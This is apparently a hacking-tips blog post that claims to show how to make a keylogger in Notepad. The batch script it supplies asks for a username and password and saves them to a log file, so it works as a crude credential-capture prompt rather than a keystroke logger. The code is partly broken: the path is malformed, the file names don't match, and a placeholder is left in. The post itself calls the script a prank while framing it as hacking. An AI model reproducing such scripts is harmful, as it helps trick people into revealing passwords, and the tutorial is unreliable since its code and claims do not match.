How to Record Computer Keystrokes & Create Keylogger In Notepad
If you already know about a keylogger, then it is very easy to understand you. For new readers, I will explain the meaning of Keylogger below.
Keylogger is a method, which records every keystroke on the computer. It records all the activity doing on the computer. In this tutorial, I will tell you about the Notepad Keylogger, By using of this keylogger you don’t require any additional software.
Follow the below given instructions to create a keylogger.
Note: The hacking trick which is given below is only for the Educational purpose, if you used these hacking tricks for black hat hacking then you may be put into trouble. The admin of site is not responsible if you used these hacking tricks for an illegal purpose.
Create Keylogger in Notepad & Record Computer keystrokes
You don’t require any professional skills to create this Keylogger. Just open the notepad and follow the steps.
Creating Keylogger With Notepad
- Just open the notepad from the start menu. Copy and paste the below given code into the notepad.
echo Please Enter Your Email Address And Password
cd “C: Activity”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
- Save this file on the desktop as a logs.bat file.
- Now create the folder named the activity and paste it into c drive. Note that keylogger will not work if you named the folder something else.
- Now test your logs.bat file by entering the username and password.
- To check logs open the folder activity and there you will find the text file named logs.txt.
That’s it, you have done all the steps.
so that’s how you can create keylogger with notepad. Actually, this is a prank file. You can only record the strokes, which are entered in a batch file. To record all the activity like browsing and account information you must stay touch with us.
In my next article, I will tell you about keylogger hacking method. In that tutorial, you will learn about real keylogging. So like us or subscribe our newsletter.